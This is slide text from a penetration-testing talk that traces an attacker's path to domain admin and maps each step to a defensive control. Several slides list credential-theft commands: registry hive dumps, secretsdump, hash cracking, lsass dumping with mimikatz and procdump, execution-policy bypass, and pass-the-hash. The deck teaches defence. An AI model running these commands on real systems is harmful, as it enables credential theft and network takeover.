With global information security spending rapidly approaching $100 billion, you'd think we,d have a pretty good handle on preventing data breaches by now. However, considering that nearly 1 billion records have been exposed in the 5000+ data breaches publicly disclosed since 2005, you,re probably asking yourself the same question as security and risk management professionals all over the world: How does this keep happening? This presentation will walk you through a penetration tester,s process, step-by-step, as the tester goes from unauthorized outsider to domain admin (without being detected). More importantly, we,ll discuss the fundamental security controls that will shut down attackers time and again.
13. STEP 4: DUMP SAM/SYSTEM/SECURITY HIVES
Dump the hives
reg.exe save hklmsam c:sam.save
reg.exe save hklmsystem c:system.save
reg.exe save hklmsecurity c:security.save
This one may require elevated privileges
If so, psexec.exe -i -s cmd.exe, then execute
within new command prompt window
While you’re there, scope out users & groups
net user /domain > domain_users.txt
net groups /domain >
domain_groups.txt
Exfiltrate
Box, Dropbox, Google Drive, OneDrive, ShareFile
14. STEP 5: EXTRACT HASHES AND GET CRACKING
Extract hashes with Impacket (offline)
https://github.com/CoreSecurity/impacket
secretsdump.py -sam sam.save -security
security.save -system system.save LOCAL
Crack SAM hashes
LM -> Ophcrack
NT -> hashcat or John the Ripper
HashKiller
https://hashkiller.co.uk/ntlm-decrypter.aspx
Crack domain creds
hashcat or John the Ripper
15. STEP 6: IDENTIFY ADMIN ACCOUNTS
Impacket output
Administrator = RID -500 (“the dash 500 account”)
Verify Local Admins
net localgroup administrators
Dump Active Directory
AD Users and Computers
Apache Directory Studio
Softerra LDAP Administrator/Browser
LDAP Admin (portable?)
16. STEP 7: FIND ACTIVE DA LOGINS
PowerShell Empire
https://github.com/PowerShellMafia/PowerSploit
https://github.com/PowerShellMafia/PowerSploit/tree/m
aster/Recon
Invoke-UserHunter
Input options
Individual username
List of usernames
Domain group
List of hosts
PowerShell ProTip
powershell -exec bypass
17. STEP 8: PASS THE HASH
Invoke-TheHash
https://github.com/Kevin-Robertson/Invoke-TheHash
Dump lsass (Local Security Authority
Subsystem Service)
Start > Run > taskmgr.exe
Show processes from all users
lsass.exe > Right Click > Dump
c:UsersusernameAppDataLocalTemplsass.DMP
Grab passwords from lsass
Online -> procdump.exe
https://technet.microsoft.com/en-
us/sysinternals/dd996900.aspx
Offline -> mimikatz
https://github.com/gentilkiwi/mimikatz
19. NOTHING NEW UNDER THE SUN
DumpingWindows Credentials (December 20, 2013)
https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/
I Hunt Sys Admins (January 19, 2015)
http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
Password Spraying Outlook Web Access (February 17, 2016)
http://www.blackhillsinfosec.com/?p=4694
22. COMMON SENSE SECURITY FRAMEWORK
Seven (7) Areas of Protection
ProtectYour Applications
ProtectYour Endpoints
ProtectYour Network
ProtectYour Servers
ProtectYour Data
ProtectYour Locations
ProtectYour People
Three (3)Yes/No Questions per Area
Guidance (free, open source, commercial)
https://commonsenseframework.org/
25. EVERY BREATHYOU TAKE… EVERY MOVEYOU MAKE…
Step Control
Gather OSINT S01 - Do you follow documented system hardening procedures to secure your servers?
Score Some Creds D02 - Do you periodically review employee account security to ensure that access is appropriate (i.e., least
privilege, individuals accounts, strong passwords)?
Logon to an Internal System N03 - Do you require two factor authentication for remote/VPN access, as well as access to third party
(hosted) applications?
Dump SAM/System/Security Hives S02 - Do you centrally store and actively monitor critical security logs for suspicious events (such as
abnormal admin account activity)?
Extract Hashes and Get Cracking See S02
Identify Admin Accounts E02 - Do you limit local administrator account usage?
Find Active DA Logins See S02
Pass the Hash See S02
28. LEADERSHIP NEEDS CONTEXT
Information Security SpendingWill Top $101 Billion By 2020
http://www.darkreading.com/operations/information-security-spending-will-top-$101-billion-by-2020/d/d-id/1327178
World's Biggest Data Breaches
http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
Privacy Rights Clearinghouse's Chronology of Data Breaches
https://www.privacyrights.org/data-breaches
Verizon Data Breach Investigations Report (DBIR)
http://www.verizonenterprise.com/verizon-insights-lab/dbir/
29. YOUR HOMEWORK
Self-assess your organization against the CSSF
Schedule a red team / blue team exercise using these steps as a guide
Post mortem the exercise
Update policies, procedures, and standards based on the post mortem
Site down with leadership (steering committee) and share what you learned
Fix all the things!